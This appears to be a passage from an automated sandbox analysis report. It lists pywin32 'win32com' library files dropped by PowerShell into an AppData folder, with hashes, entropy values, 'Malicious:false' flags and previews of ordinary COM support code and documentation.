                                                                                                                                                                                                  Preview:# A demo plugin for Microsoft Outlook (NOT Outlook Express).#.# This addin simply adds a new button to the main Outlook toolbar,.# and displays a message box when clicked. Thus, it demonstrates.# how to plug in to Outlook itself, and hook outlook events..#.# Additionally, each time a new message arrives in the Inbox, a message.# is printed with the subject of the message..#.# To register the addin, simply execute:.# outlookAddin.py.# This will install the COM server, and write the necessary.# AddIn key to Outlook.#.# To unregister completely:.# outlookAddin.py --unregister.#.# To debug, execute:.# outlookAddin.py --debug.#.# Then open Pythonwin, and select "Tools->Trace Collector Debugging Tool".# Restart Outlook, and you should see some output generated..#.# NOTE: If the AddIn fails with an error, Outlook will re-register.# the addin to not automatically load next time Outlook starts. To.# correct this, simply re-register the addin (see above)..import sys..import pythoncom.fro

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\demos\trybag.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2088
                                                                                                                                                                                                  Entropy (8bit):4.841312035932402
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:DezkLUSx4SXwuhnCOer+UtylNRCbcfqUDqaUMGkUs1x2W2RCu:DeXu4cw4n9gt0Cbc1edMGkUs1x2W2RX
                                                                                                                                                                                                  MD5:05A4C79538B5C128E768BB151D62B305
                                                                                                                                                                                                  SHA1:EC53BC9528D5BB0D72392C21556C7F8C8C18DEF7
                                                                                                                                                                                                  SHA-256:6455CA354B75CF3CFAB9402A1E20297B600FD07DE028B49FA2BC12818C3937B5
                                                                                                                                                                                                  SHA-512:0A4028F966F939A8239406A975B5860EEAF4FD3F45C6C66B8206D0D6371B07C69663680EBC138A60E992D1C4D0D8AE9F5AE671BF412A3B82D16AED47B23F2570
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import pythoncom.from win32com.server import exception, util..VT_EMPTY = pythoncom.VT_EMPTY...class Bag:. _public_methods_ = ["Read", "Write"]. _com_interfaces_ = [pythoncom.IID_IPropertyBag].. def __init__(self):. self.data = {}.. def Read(self, propName, varType, errorLog):. print("read: name=", propName, "type=", varType). if propName not in self.data:. if errorLog:. hr = 0x80070057. exc = pythoncom.com_error(0, "Bag.Read", "no such item", None, 0, hr). errorLog.AddError(propName, exc). raise exception.Exception(scode=hr). return self.data[propName].. def Write(self, propName, value):. print("write: name=", propName, "value=", value). self.data[propName] = value...class Target:. _public_methods_ = ["GetClassID", "InitNew", "Load", "Save"]. _com_interfaces_ = [pythoncom.IID_IPersist, pythoncom.IID_IPersistPropertyBag].. def GetClassID(self):. rai

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\include\PythonCOM.h

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30291
                                                                                                                                                                                                  Entropy (8bit):5.191660584865603
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:T3NxCIlJB+AOxPMVJ4s6/ixXl3OPRUMM1sm8:T3NZJOxPgJ0/sXgPRl
                                                                                                                                                                                                  MD5:3AB6186148CDF889998AE52D3DD456ED
                                                                                                                                                                                                  SHA1:2B0A656ECDA5AF68F3309C875F6A0BF0D1C287D7
                                                                                                                                                                                                  SHA-256:B4787DA122CC411A498E1CEB8C9F553F61AB75C3C64C8880EF5FF916C6132427
                                                                                                                                                                                                  SHA-512:74E1D73C06FF3DD293A19326EC223DEFF8B3E2957251164E9B6CE696C3C03D8A14DA1F41F2A8123C7ECF1675EC26D5FE7FE4EB038D6E3E2CE6CCC7ABD1B331EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:/* PythonCOM.h.. Main header for Python COM support... This file is involved mainly with client side COM support for. Python... Most COM work put together by Greg Stein and Mark Hammond, with a. few others starting to come out of the closet.... --------------------------------------------------------------------. Thread State Rules. ------------------. These rules apply to PythonCOM in general, and not just to. the client side... The rules are quite simple, but it is critical they be followed.. In general, errors here will be picked up quite quickly, as Python. will raise a Fatal Error. However, the Release() issue in particular. may keep a number of problems well hidden... Interfaces:. -----------. Before making ANY call out to COM, you MUST release the Python lock.. This is true to ANY call whatsoever, including the COM call in question,. but also any calls to "->Release();".. This is normally achieved with the calls. PY_INTERFACE_PRECALL and PY_INTERFACE_POSTCALL, which release. an

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\include\PythonCOMRegister.h

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4264
                                                                                                                                                                                                  Entropy (8bit):4.397028432654304
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TyohkJzoxaK1tIEOrtl4Yz54ev7+RiAG9rh:Tyohk49OYYz54wqRiV9rh
                                                                                                                                                                                                  MD5:B198C9127BCD708943E89FA4DCF54414
                                                                                                                                                                                                  SHA1:950143556273F7D0EB815A59AFD17B32CB568552
                                                                                                                                                                                                  SHA-256:4727BC4FCA34D7C70FCC0897A78DFB94B88D82029668D0DD030E5DBD8C654FFF
                                                                                                                                                                                                  SHA-512:35EBAAC04C67857E9CA8388DFC24486928D03DC795268B864D44B051C30AE173F0535D50F5C3F5C2DB10C1F9DDDD630920E69C2B90590C9E87EDA391C0B21038
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:// Support for PythonCOM and its extensions to register the interfaces,.// gateways and IIDs it supports..//.// The module can simply declare an array of type PyCom_InterfaceSupportInfo, then.// use the macros to populate it..//.// See Register.cpp and AXScript.cpp for examples on its use...#ifndef __PYTHONCOMREGISTER_H__.#define __PYTHONCOMREGISTER_H__..#include "PythonCOMServer.h" // Need defns in this file.....typedef struct {. const GUID *pGUID; // The supported IID - required. const char *interfaceName; // Name of the interface - required. const char *iidName; // Name of the IID that goes into the dict. - required. PyTypeObject *pTypeOb; // the type object for client PyI* side - NULL for server only support.. pfnPyGatewayConstructor ctor; // Gateway (PyG*) interface constructor - NULL for client only support..} PyCom_InterfaceSupportInfo;..#define PYCOM_INTERFACE_IID_ONLY(ifc) \. {

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\include\PythonCOMServer.h

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9027
                                                                                                                                                                                                  Entropy (8bit):4.474111423776976
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nOiD5kIJMJ3PM9DxA/TwHwpev4aI4b4fj4Cbv4jDm4u4O4K474z4BIGmSTVA/qqD:nOiD+lPkH6ES/90g
                                                                                                                                                                                                  MD5:7A1C425DC9D5F72AA1A9AD6DA5D7A0F4
                                                                                                                                                                                                  SHA1:41C855FB6ED7B77C6BA2023C4DF379D8DB84C86F
                                                                                                                                                                                                  SHA-256:C8BAFAB9869FEF9EE906D514E8E06E928BC1C135FA2A68BC5F817DAD89EE478F
                                                                                                                                                                                                  SHA-512:AE7EB27F8B4398D5F62DF8C08D3B7E3D77294DD280696AAE3E5A9CFBAAA7EC71FD076DD9B9E6F8677F622E2BBA01E73290CC5FAA603619224BEBAA29DD60B4EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#ifndef __PYTHONCOMSERVER_H__.#define __PYTHONCOMSERVER_H__..// PythonCOMServer.h :Server side COM support..#include <Python.h>..#define DLLAcquireGlobalLock PyWin_AcquireGlobalLock.#define DLLReleaseGlobalLock PyWin_ReleaseGlobalLock..void PYCOM_EXPORT PyCom_DLLAddRef(void);.void PYCOM_EXPORT PyCom_DLLReleaseRef(void);..// Use this macro at the start of all gateway methods..#define PY_GATEWAY_METHOD CEnterLeavePython _celp..class PyGatewayBase;.// Gateway constructors..// Each gateway must be able to be created from a "gateway constructor". This.// is simply a function that takes a Python instance as as argument, and returns.// a gateway object of the correct type. The MAKE_PYGATEWAY_CTOR is a helper that.// will embed such a constructor in the class - however, this is not necessary -.// _any_ function of the correct signature can be used...typedef HRESULT (*pfnPyGatewayConstructor)(PyObject *PythonInstance, PyGatewayBase *, void **ppResult, REFIID iid);.HRESULT PyCom_MakeRegistered

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\libs\axscript.lib

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:current ar archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):70698
                                                                                                                                                                                                  Entropy (8bit):5.414650454855484
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:B3Ct2UYJ28RE+7XFdaU8us+ASqaykDvZlbeXQUDYHBWkathYEnKp9l90ncY9P+Z+:B3Ct2UYJ2eAnKp9l9ngprsl+7
                                                                                                                                                                                                  MD5:E368160E8FD3E04AE678523D8732EDD9
                                                                                                                                                                                                  SHA1:1629D1298D21988B46ADEF5E971C85E8E25247EE
                                                                                                                                                                                                  SHA-256:E51D6CAAF41056327177FC03DC6C5BFBDC82E4A52B64FC87424CF70D16B8F694
                                                                                                                                                                                                  SHA-512:69BBD6AAC1008A035D8287D614B35C83F2424ED885D2FA3438602BE70246CFCFD654B4792F069F4B87BD40EB0F234C4F23C095B762036DF3420429C0DA78E3F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:!<arch>./ -1 0 20695 `....i...~...................~.......&..........n.......N...t.............t...........n......."...............t.......V......L...R...R...................>...>...........:...:...........l...l..."..."...H...H.................................b...b...h...h...................................>...>...x...x...6...6...........................D...D...................|...|...Z...Z...........0...0...|...|...4...4...................0...0...b...b...........................b...b...........P...P................................."..."...........X...X...(...(.................................................J...J...........................<...<...2...2.........................................~...~...8...8...J...J...........r...r...................................Z...Z...........p...p...................n...n...........4...4.......................N...N...l...l.................x...x.........J...J...v...v.................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\libs\pythoncom.lib

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:current ar archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):155736
                                                                                                                                                                                                  Entropy (8bit):5.470470467759092
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:vt3gJ+MUw37r5vRE752vdPoDYwaYrT6oY0RsRSdQbM8:vt3gN37r5vi75WPoDYwJ6oY0RsRSST
                                                                                                                                                                                                  MD5:1E4E50A3C3EEC56A92D99859BC343A83
                                                                                                                                                                                                  SHA1:7B80F0508B27C217677A5B1DECA27FE5450BBA40
                                                                                                                                                                                                  SHA-256:DE8920C24121076DCC77753A536B40BDAB9D96A4EF8D71DFF42F2DDD284AA266
                                                                                                                                                                                                  SHA-512:4BE95CE619EE395D57F2B27F172A809E60914C14122D1BCC9930E6ADB36A86D38FE4A33FC1582BB4EA9D572959E34D1BFAC102186E53FD53351CA68875583487
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:!<arch>./ -1 0 44603 `....Y..]...`...aj...........b...b...................d...d.........................._..._........X.......@...4...............R...8...f......."..."...........T...T...........>...>...................6...6...Z...Z...........................................$...$..........................n...n...=...=...................m...m...=V..=V... ... ...........P...P..)...)...........}J..}J..(...(....f...f..~N..~N..)L..)L..........y...y...&...&....R...R..z...z...&...&...........l...l....~...~..........p...p...>...>...!...!....(...(..o...o... t.. t...h...h...P...P..*...*............................p...p...........|...|...........x...x..........j...j...N$..N$..M...M...FT..FT...b...b...................<...<...........8...8...x...x..0...1...10..0"..-...-...+...+....................J...J...<...<..K...K...c...c...M...M...Lz..Lz..d...d...J...J....@...@..e`..e`...........6...(...(...........p...p...................Z...Z..+...+...,...,.........

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\makegw\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30
                                                                                                                                                                                                  Entropy (8bit):3.973557262275185
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SK2h+FVjWSvn:SzIvjjv
                                                                                                                                                                                                  MD5:BA42EF20D93BA7415413FCD3F21EFB55
                                                                                                                                                                                                  SHA1:B0D0EEDAE009426C2BC525FC560FE6572416A97F
                                                                                                                                                                                                  SHA-256:FD88250292E1A51D97B335ECF6806D3A0C52680A941F9DE21FFB6B9E82C976EB
                                                                                                                                                                                                  SHA-512:5FE595FD307943BD9EC09CA78A4DC07055C0B131B5A030C900936904FE70219FD1E0614588265A42838063E5AF5C9FA9A4A4D8B7F97C48BEF8C9A52EDC72C5DC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# indicates a python package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\makegw\makegw.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20176
                                                                                                                                                                                                  Entropy (8bit):4.575209015581771
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:twHXSHGNtJKREawSP8m86dZUmhPJ9nV1oHuT42MilRQt1dK+EsfVPm6TrwEFSSMF:t8NtOEawSP8P6dZUmhCKbsfVPTkNKy/
                                                                                                                                                                                                  MD5:5D2E6FFF9BD431CF49C8D3275299FD80
                                                                                                                                                                                                  SHA1:B69B8E2B7D56919EA1D21A454A98D6A365192FB9
                                                                                                                                                                                                  SHA-256:C499367F47853D6A4178BFC35170EAF95CCF6623F5139F01ACC55E381FE70CC2
                                                                                                                                                                                                  SHA-512:19A70A1A640428152EE8A0BF4E0E5D8D4432E41517FEB59BE6F3A69C95C2B3FDF4DC631904D3D913CF237C397C24EDEC505D07EEE1C9377D094F71AB646C33FA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utility functions for writing out gateway C++ files.. This module will generate a C++/Python binding for a specific COM. interface.. . At this stage, no command line interface exists. You must start Python, . import this module, change to the directory where the generated code should. be written, and run the public function.. . This module is capable of generating both 'Interfaces' (ie, Python. client side support for the interface) and 'Gateways' (ie, Python. server side support for the interface). Many COM interfaces are useful. both as Client and Server. Other interfaces, however, really only make. sense to implement one side or the other. For example, it would be pointless. for Python to implement Server side for 'IRunningObjectTable', unless we were. implementing core COM for an operating system in Python (hey - now there's an idea!). . Most COM interface code is totally boiler-plate - it consists of. converting arguments, dispatching the call to Python, a

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\makegw\makegwenum.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9847
                                                                                                                                                                                                  Entropy (8bit):5.399405890181776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:EcpyojruGhiAqTPQPkAqXjXhXqLXZXp2X2VXeZAXyb4tsZI:3z/uGcAuAqzRuJ5286AXyb4EI
                                                                                                                                                                                                  MD5:9CCF0CA7E709CD2E6B5D476F378DEF95
                                                                                                                                                                                                  SHA1:34A01A55208EB7B3395F3BBF2800DDBE07674BE5
                                                                                                                                                                                                  SHA-256:E949A4B0C3930B22EB01C0D35BA192360FEEE6EB36D27ACBBE03B8B804FC025F
                                                                                                                                                                                                  SHA-512:CF762EBE591CB41808A06D607C7BCB8FB084CD249634633D3D35482E9E8BEEA9C0EB27E8265E4A6B5BA424862AADF550A94F61E1031AE5821D5BA0D3C77B7FB3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utility file for generating PyIEnum support...This is almost a 'template' file. It simplay contains almost full.C++ source code for PyIEnum* support, and the Python code simply.substitutes the appropriate interface name...This module is notmally not used directly - the @makegw@ module.automatically calls this..""".#.# INTERNAL FUNCTIONS.#.#.import string...def is_interface_enum(enumtype):. return not (enumtype[0] in string.uppercase and enumtype[2] in string.uppercase)...def _write_enumifc_cpp(f, interface):. enumtype = interface.name[5:]. if is_interface_enum(enumtype):. # Assume an interface.. enum_interface = "I" + enumtype[:-1]. converter = (. "PyObject *ob = PyCom_PyObjectFromIUnknown(rgVar[i], IID_%(enum_interface)s, FALSE);". % locals(). ). arraydeclare = (. "%(enum_interface)s **rgVar = new %(enum_interface)s *[celt];" % locals(). ). else:. # Enum of a simple structure. conv

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\makegw\makegwparse.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34854
                                                                                                                                                                                                  Entropy (8bit):4.80766491378114
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:BYm6rknUQcV8SzdUmeibJWcPC8XGqM3jZD9O18Y6OMJlj:vpqOV9OS
                                                                                                                                                                                                  MD5:46A0AD8E52F6DAB936F214B2CF90C61C
                                                                                                                                                                                                  SHA1:2F86C72EE3FFD7E5513A8985FE1D94A293BDA47F
                                                                                                                                                                                                  SHA-256:283844A35361A2DCE5B671A8D66DF111DF67049B3E023E22FD332A67254D7DEF
                                                                                                                                                                                                  SHA-512:2C0889EA767642F9240BC631B24E3E68FE5A03C0B969F1140A0555E74838ED5C69F839BE9DD644518008EC71C2C85AA0D1DE10D30ED0748B31C8F8F58896C0E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for makegw - Parse a header file to build an interface.. This module contains the core code for parsing a header file describing a. COM interface, and building it into an "Interface" structure... Each Interface has methods, and each method has arguments... Each argument knows how to use Py_BuildValue or Py_ParseTuple to. exchange itself with Python.. . See the @win32com.makegw@ module for information in building a COM. interface.""".import re.import traceback...class error_not_found(Exception):. def __init__(self, msg="The requested item could not be found"):. super(error_not_found, self).__init__(msg)...class error_not_supported(Exception):. def __init__(self, msg="The required functionality is not supported"):. super(error_not_supported, self).__init__(msg)...VERBOSE = 0.DEBUG = 0..## NOTE : For interfaces as params to work correctly, you must.## make sure any PythonCOM extensions which expose the interface are loaded.## before generating....class Arg

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\olectl.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2626
                                                                                                                                                                                                  Entropy (8bit):4.935656889264299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:u5riPyEAcqbTwJUek5K6FDHv7URlY3JQKh:mriPyEATbIUn5K8DP7slY3Jh
                                                                                                                                                                                                  MD5:68696E6FE76DE40C39CB9DCB0D0A5385
                                                                                                                                                                                                  SHA1:64DB43664DD46D3E0CA40D845FE4FF4C9B2E1EA3
                                                                                                                                                                                                  SHA-256:EC5013D1FB45A684992BAECEB53DC602F8A6CA88E90B0500D8395244B1D85AAC
                                                                                                                                                                                                  SHA-512:A0639C8B37FAA246D4F67B3670314694D2963474A24FC1DEF0EB87AF66F6E8A61816A18EE9319A73B8EE8B4D61B58024C7750D3D2F840F3603C91A810B5A1982
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Constants used by COM Controls.. Hand created version of OLECTL.H constants.."""..import winerror..FACILITY_CONTROL = 0xA...def MAKE_SCODE(sev, fac, code):. return int((int(-sev) << 31) | ((fac) << 16) | ((code)))...def STD_CTL_SCODE(n):. return MAKE_SCODE(winerror.SEVERITY_ERROR, FACILITY_CONTROL, n)...CTL_E_ILLEGALFUNCTIONCALL = STD_CTL_SCODE(5).CTL_E_OVERFLOW = STD_CTL_SCODE(6).CTL_E_OUTOFMEMORY = STD_CTL_SCODE(7).CTL_E_DIVISIONBYZERO = STD_CTL_SCODE(11).CTL_E_OUTOFSTRINGSPACE = STD_CTL_SCODE(14).CTL_E_OUTOFSTACKSPACE = STD_CTL_SCODE(28).CTL_E_BADFILENAMEORNUMBER = STD_CTL_SCODE(52).CTL_E_FILENOTFOUND = STD_CTL_SCODE(53).CTL_E_BADFILEMODE = STD_CTL_SCODE(54).CTL_E_FILEALREADYOPEN = STD_CTL_SCODE(55).CTL_E_DEVICEIOERROR = STD_CTL_SCODE(57).CTL_E_FILEALREADYEXISTS = STD_CTL_SCODE(58).CTL_E_BADRECORDLENGTH = STD_CTL_SCODE(59).CTL_E_DISKFULL = STD_CTL_SCODE(61).CTL_E_BADRECORDNUMBER = STD_CTL_SCODE(63).CTL_E_BADFILENAME = STD_CTL_SCODE(64).CTL_E_TOOMANYFILES = STD_CTL_SCODE(67

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\readme.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3719
                                                                                                                                                                                                  Entropy (8bit):4.868092224015867
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:PASMD/23erRuX5WMbTA9AoOeXvOkmZM7ThZfDZ3I9aQ:P46+ITAgWmW7lZf2R
                                                                                                                                                                                                  MD5:9526997CC08298A2385B3AB78BC198C3
                                                                                                                                                                                                  SHA1:230227292D5DE2BC0D73188A010EC44A6E84BBAD
                                                                                                                                                                                                  SHA-256:605AF9EA17CE0A2AA2F88E9A750B5F2B6809F6A4D2C19C05ABB657650CF772F6
                                                                                                                                                                                                  SHA-512:2766F2D414681646281B5343DE2F035918D2C462011D3193BBF3ECC7F8DC496123545FA9D11A9337811481711470573DCFA7CF809FEF8AC63F744DE501C56B3B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang="en">.<head>. <title>win32com Readme</title>.</head>.<body>. .<p><img width="551" height="99" id="_x0000_i1025". src="html%5Cimage%5Cpycom_blowing.gif". alt="Python and COM - Blowing the others away"> </p>. .<h1>Python COM Extensions Readme </h1>. .<p>This is the readme for win32com. Please check out the <a. href="html/docindex.html">win32com documentation index</a></p>. .<p>The <a href="test/.">win32com/test directory</a> contains some interesting. scripts (and a new <a href="test/readme.txt">readme.txt</a>). Although these. are used for testing, they do show a variety of COM techniques.</p>..<h3>VARIANT objects</h3>.<p>win32com.client now has explicit VARIANT objects which can be used in.situations where you need more control over the argument types passed when.calling COM methods. See the <a href="html/variant.html">documentation on.this object</a>..<a name="currency"><h3>Important Currency changes</h3></a>.<p>.In all builds prior to 204, a COM

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                  Entropy (8bit):4.29082650068666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SN7cF55IbMCwmF37Uuvn:SNwCwy37Uuv
                                                                                                                                                                                                  MD5:82A4AC7481C3360B6A75C3EC790E0B2F
                                                                                                                                                                                                  SHA1:43DFD78709CFC4F5120F5409A1159170007CD5DD
                                                                                                                                                                                                  SHA-256:5837731C114E3B7C978F01D6230282A5A85EB16B6CB085882535518C2B58A0BB
                                                                                                                                                                                                  SHA-512:4516B83B661F587899B7D269FB815C3D4F84037F105830EEB44F3E52461DAF2E7F05ABBA1E33B4C20CAC655E2729B3409FC90072066166646788A4D82857CDBE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Empty __init__ file to designate a sub-package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\connect.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2780
                                                                                                                                                                                                  Entropy (8bit):4.553893776894134
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:plZbTZ+1Xlh4ltllXlD/PDlIeXlhdXlKSXlYXlmgxDXlZlLjEEG/J1S5CJ8lXlaC:pHZElCltl9lTLlfljlKslSlmghlZlENQ
                                                                                                                                                                                                  MD5:396562952093B33EA5240C8BC6E0FFC8
                                                                                                                                                                                                  SHA1:BDB107892B56BF58C3A2993F4719786789A7627F
                                                                                                                                                                                                  SHA-256:9C7EC4B7878A83182038EAA856F3EA2F8C405F6FD5DF8F8CF63AA0566CFF2D8E
                                                                                                                                                                                                  SHA-512:879AF1EC5FEEC33B9502AF7319F56B85D101FB29F315443D2C17B92607A3A590CA7A689FB3576F30B8C8905AA3ABA75EB1A5C90910400FAD534D9DF083F157AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for Server Side connections... A collection of helpers for server side connection points..""".import pythoncom.import win32com.server.util.import winerror.from win32com import olectl..from .exception import Exception..# Methods implemented by the interfaces..IConnectionPointContainer_methods = ["EnumConnectionPoints", "FindConnectionPoint"].IConnectionPoint_methods = [. "EnumConnections",. "Unadvise",. "Advise",. "GetConnectionPointContainer",. "GetConnectionInterface",.]...class ConnectableServer:. _public_methods_ = IConnectionPointContainer_methods + IConnectionPoint_methods. _com_interfaces_ = [. pythoncom.IID_IConnectionPoint,. pythoncom.IID_IConnectionPointContainer,. ].. # Clients must set _connect_interfaces_ = [...]. def __init__(self):. self.cookieNo = 0. self.connections = {}.. # IConnectionPoint interfaces. def EnumConnections(self):. raise Exception(winerror.E_NOTIMPL).. def GetConnecti

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\dispatcher.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9975
                                                                                                                                                                                                  Entropy (8bit):4.595107747090245
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:4i9MMxb7wjBfGujx6rMAwOw6gjRm5OMBjfydYR5hjnf:4i99xRodJ6Lf
                                                                                                                                                                                                  MD5:96AD74AB698B539ED8116C23BB65DCB9
                                                                                                                                                                                                  SHA1:4841F432849C161B8F7D82B7FA419EA6815EB956
                                                                                                                                                                                                  SHA-256:9407FD5B735C360346663A5D84E214D49867A71FBC7FC8981C3295BA630C0D9F
                                                                                                                                                                                                  SHA-512:CBCA45D7AFDEB60590C9DBC6690BAD76B06079ACBBB3331612A735D350E4455177B92EA79CFF8E4D738CD35849B3C1B125B2B2FD1CB60BCDA4B748F42D8E67AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Dispatcher..Please see policy.py for a discussion on dispatchers and policies.""".import traceback.from sys import exc_info..import pythoncom.import win32api.import win32com..#.from win32com.server.exception import IsCOMServerException.from win32com.util import IIDToInterfaceName...class DispatcherBase:. """The base class for all Dispatchers... This dispatcher supports wrapping all operations in exception handlers,. and all the necessary delegation to the policy... This base class supports the printing of "unexpected" exceptions. Note, however,. that exactly where the output of print goes may not be useful! A derived class may. provide additional semantics for this.. """.. def __init__(self, policyClass, object):. self.policy = policyClass(object). # The logger we should dump to. If None, we should send to the. # default location (typically 'print'). self.logger = getattr(win32com, "logger", None).. # Note the "return self._H

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\server\exception.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3496
